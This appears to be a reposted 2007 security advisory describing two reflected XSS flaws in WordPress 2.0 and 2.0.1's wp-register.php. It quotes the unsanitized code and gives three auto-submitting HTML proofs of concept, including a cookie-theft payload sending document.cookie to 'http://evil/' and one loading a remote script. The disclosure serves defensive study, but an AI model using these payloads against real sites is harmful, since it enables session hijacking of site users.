2 vanilla XSS on Wordpress "wp-register.php"

2007.09.27
Credit: Adrian P
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

There are two vanilla XSS on &#8216;wp-register.php&#8217;. Only early versions of the 2.0 branch are affected. Version 2.0 is vulnerable through the &#8216;user_login&#8217; and &#8216;user_email&#8217; parameters. Version 2.0.1 filters the &#8216;user_login&#8217; parameter but is still vulnerable through the &#8216;user_email&#8217; parameter (half-baked fix?). The XSS is only exploitable through a &#8216;POST&#8217; request. WordPress 2.0.4 is not vulnerable, so I&#8217;m assuming anything after this is not vulnerable either (unless there is a comeback of course). Note: user registration is disabled by default. Only sites with &#8216;user registration&#8217; enabled are affected. line 16 and 17 on version 2.0.1 : $user_login = sanitize_user( $_POST[&#8217;user_login&#8217;] ); $user_email = $_POST[&#8217;user_email&#8217;]; we can notice that &#8216;user_login&#8217; is sanitized but &#8216;user_email&#8217; is not and eventually gets printed without further filtering on line 114: <?php echo $user_email; ?> I contacted the vendor and asked them if these issues had been fixed silently since I couldn&#8217;t find them documented anywhere (even though they had been fixed from version 2.0.4 on). However, I got NO response from the vendor whatsoever. simple PoC: <html> <head></head> <body> <form method="post" action="http://target/wordpress/wp-register.php" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value=&apos;"><script>alert(1)</script>&apos; /> <input type="hidden" name="user_email" id="user_email" value=&apos;"><script>alert(2)</script>&apos; /> </form> <script>document.forms[0].submit()</script> </body> </html> will popup &#8216;1&#8242; and &#8216;2&#8242; on version 2.0, and only &#8216;2&#8242; on version 2.0.1. cookie theft PoC: <html> <head></head> <body> <form method="post" action="http://target/wordpress/wp-register.php#location=&apos;http://evil/?&apos;+document.cookie" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value="anyusername" /> <input type="hidden" name="user_email" id="user_email" value=&apos;"><script>eval(location.hash.substr(1))</script>&apos; /> </form> <script>document.forms[0].submit()</script> </body> </html> unrestricted script insertion from third-party site (we prove we can inject ANY JS): <html> <head></head> <body> <form method="post" action="http://victim/wordpress/wp-register.php" > <input type="hidden" name="action" value="register" /> <input type="hidden" name="user_login" id="user_login" value="test" /> <input type="hidden" name="user_email" id="user_email" value=&apos;"><SCRIPT src=http://evil/jsfile></SCRIPT>&apos;> </form> <script>document.forms[0].submit()</script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top